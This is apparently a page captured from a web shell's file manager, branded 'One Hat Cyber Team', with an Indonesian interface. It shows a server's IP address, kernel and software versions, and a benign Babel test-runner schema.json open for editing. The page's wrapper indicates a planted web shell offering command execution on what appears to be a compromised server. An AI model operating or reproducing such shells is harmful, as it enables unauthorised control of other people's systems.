⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
nodejs
/
@babel
/
helper-fixtures
/
data
/
Edit File: schema.json
{ "$schema": "http://json-schema.org/draft-07/schema#", "title": "Options", "description": "JSON schema for Babel Fixture Test Runner", "allOf": [ { "$ref": "#/definitions/TaskOption" }, { "$ref": "https://json.schemastore.org/babelrc", "$comment": "Todo: switch to our inhouse schema" } ], "definitions": { "OS": { "type":"string", "description": "The possible values of `process.platform`. See https://nodejs.org/api/process.html#process_process_platform", "enum": ["aix", "darwin", "freebsd", "linux", "openbsd", "sunos", "win32"] }, "TaskOption": { "type": "object", "properties": { "BABEL_8_BREAKING": { "description": "Whether this test should run when BABEL_8_BREAKING is enabled", "type":"boolean" }, "ignoreOutput": { "description": "Whether the test should generate and compare with output.js", "type": "boolean" }, "minNodeVersion": { "description": "The minimum Node.js version this test should run on", "type": "string", "pattern": "^\\d+(\\.\\d+){0,2}$" }, "os": { "description": "The OS this test should run on", "anyOf": [ { "type": "array", "items": { "$ref": "#/definitions/OS" } }, { "$ref": "#/definitions/OS" } ] }, "throws": { "description": "Expected thrown error message", "type":"string", "default": "" }, "validateLogs": { "description": "Whether this test should validate the stdout and stderr", "type":"boolean", "default": false } } } } }
Simpan